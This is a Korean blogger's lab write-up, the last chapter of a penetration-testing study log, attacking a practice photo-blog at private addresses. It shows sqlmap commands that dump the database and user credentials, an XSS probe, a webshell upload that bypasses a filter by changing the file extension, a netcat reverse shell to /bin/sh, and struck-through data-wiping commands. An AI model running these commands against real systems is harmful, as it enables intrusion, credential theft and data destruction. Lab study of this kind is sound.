Chapter 18 실전 모의해킹[END]



!warning!

본 게시글은 본인의 학습기록을 위해 작성된 알려진 학습 기법

함부로 악의적으로 이용은 엄연히 불법 임으로

절대 시도하지 말 것이며

사고 발생 시 본인은 절대로 책임지지 않습니다!

예고대로 마지막은 큐라레:마법도서관

하겠습니다.

최종 실습

1. 정보 수집


스샷. 1

-파라미터 값이 달라지는 것을 발견

2. SQL 인젝션 공격

스샷. 2

-‘을 입력했을 때 SQL 형식 관련 에러가 발생하는 것을 볼 수 있습니다.

1
sqlmap u http://192.68.37.133/cat.php?id=1’
cs

스샷. 3
– 위 명령어를 통해 sqlmap을 실행시켜 인젝션 공격이 가능한 부분을 탐색,
굵게 표시된 부분을 보니 id 파라미터가 들어가는 곳이 취약한가 봅니다 🙂

스샷. 4

1
<script>alert(‘XSS’)</script>
cs

-sql 인젝션 공격과 xss 공격이 가능한 것을 확인할 수 있습니다.

1
sqlmap u http://192.168.56.106/cat.php?id=1 currentdb
cs

스샷. 5
– 현재 DB의 이름을 알아내고,

1
sqlmap u http://192.168.56.106/cat.php?id=1 D photoblog dump
cs

스샷. 6-7
– DB 내용을 덤프 시키고, USER 테이블로부터 사용자 정보를 탈취했습니다.

3. 파일 업로드 공격

-위에서 탈취한 정보를 통해 로그인 합니다.

스샷. 8-9

-New picture에서 [ add ]를 통해 webshell.php를 업로드해봤으나 실패ōxō
~~-New picture에서 [ add ]를 통해 webshell.php를 업로드해봤으나 실패ōxō~~

1
mv webshell.php webshell.PHP
cs

-웹쉘 확장자명을 바꿔서 업로드 성공

– 이렇게 해서 사실상 타깃 시스템에 접근 성공했습니다. 이젠

– 이런 식으로 타깃의 시스템을 가지고 놀거나

– 아니면 루트권한까지 접근해서 아예
추가 정보들을 탈취하고
탈주빤스런하시던가

-파계승으로 빙의해서 타깃 시스템을 신나게 파괴하시면 됩니다 ㅋㅅㅋ;
~~cmd /c rd /s /q c:\//윈도우~~

~~or~~

~~cd /home/user/test 후 rm -rf ./*//리눅스~~

4. 리버스 쉘 침투

1
nc lvnp 4000
cs

-먼저 터미널 하나에 리스닝 포트 열어제껴둡니다.

1
nc 192.168.37.116 4000 /bin/sh
cs

– 이렇게 리버스 쉘 침투 가 성공했습니다. 위 스크린샷처럼 가지고 놀거나

– 루트 추가 권한 까지 접근해서 추가정보들을 탈취하고 탈주하시면 됩니다. 🙂


=====================================

드리어 마지막 챕터까지 작성이 끝났습니다. (*´∀`)

휴… 아예 작성 못할줄 알았는데 하늘이 도왔군요

이젠 원하지 않는 분야로 아르바이트를 하게 되어도

두고두고 소정의 시간 마다 망각하지 않겠네요ε-(´・`)

이젠 이 기초단계의 책에서 하산하고 다음 Level

로 가야겠습니다. (✿╹◡╹)

해킹 분야같은 경우 이제 부터 시작이니까 말이지요

또 시간이 나면 프로그래밍 언어랑 알고리즘

공부 혹은 코딩테스트 준비하고

(본인 같은경우 개발자 부터 시작해서)

(보안분야로 넘어갈 계획입니다)

그림이나 일러스트 그려야겠습니다 (*´∀`)

내일 시간 나면 편의점으로 처들어가서

이 책을 하산한 기념으로

축배거리 사들고 축배를 들어야겠군요 끌끌…

아무튼 이 장문을 읽어 주신 분들께 다시한번 감사드리고

좋은 하루 되시고,

하시는 일 잘되시길 바람니다. (ㆁᴗㆁ✿)

그리고 코로나 조심하시길…。